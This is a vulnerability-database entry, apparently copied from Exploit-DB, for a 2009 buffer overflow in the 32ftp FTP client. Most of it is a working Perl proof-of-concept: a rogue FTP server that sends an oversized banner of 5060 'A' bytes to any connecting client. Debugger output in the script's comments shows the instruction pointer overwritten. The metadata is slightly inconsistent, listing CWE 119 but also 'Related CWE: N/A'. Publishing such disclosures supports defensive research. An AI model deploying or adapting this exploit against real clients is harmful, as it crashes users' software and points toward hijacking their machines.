Client Side Vulnerability in the Product

vendor:

32ftp

by:

Load 99%

7,5

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: 32ftp

Affected Version From: 09.04.24

Affected Version To: 09.04.24

Patch Exists: YES

Related CWE: N/A

CPE: //a:electrasoft:32ftp:09.04.24

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2009

Client Side Vulnerability in the Product

A client side vulnerability in the product allows remote servers to cause the client to crash by sending it a large banner. The exploit is triggered when a malicious server sends a large banner of 5060 bytes to the client, which causes a buffer overflow and the client crashes.

Mitigation:

The vendor has released a patch to address this vulnerability.

Source

Exploit-DB raw data:

#!/usr/bin/perl
#
# A client side vulnerability in the product allows remote servers to cause the  client to crash by sending it a large banner.
#  By: Load 99%
#
# website: http://www.electrasoft.com/32ftp.htm
# Version:09.04.24
#
#0:005> g
# ...
#(9b0.bac): Access violation - code c0000005 (first chance)
#First chance exceptions are reported before any exception handling.
#This exception may be expected and handled.
#eax=41414141 ebx=00000001 ecx=000013e7 edx=0382ec14 esi=fffffffe edi=00000000
#eip=41414141 esp=0382f018 ebp=0382f050 iopl=0         nv up ei pl nz na pe nc
#cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
#41414141 ??              ???
#
use IO::Socket::INET;

my $socket = IO::Socket::INET->new('LocalPort' => 21,
                   'Proto' => 'tcp',
                   'Listen' => SOMAXCONN)
    or die "Can't create socket ($!)\n";
   
print "Server listening\n";
$data = "220 ".("\x41" x 5060)."\r\n";

while (my $client = $socket->accept) {
    print "send> data.\n";
    print $client $data;
}
die "Can't accept socket ($!)\n";

# milw0rm.com [2009-05-05]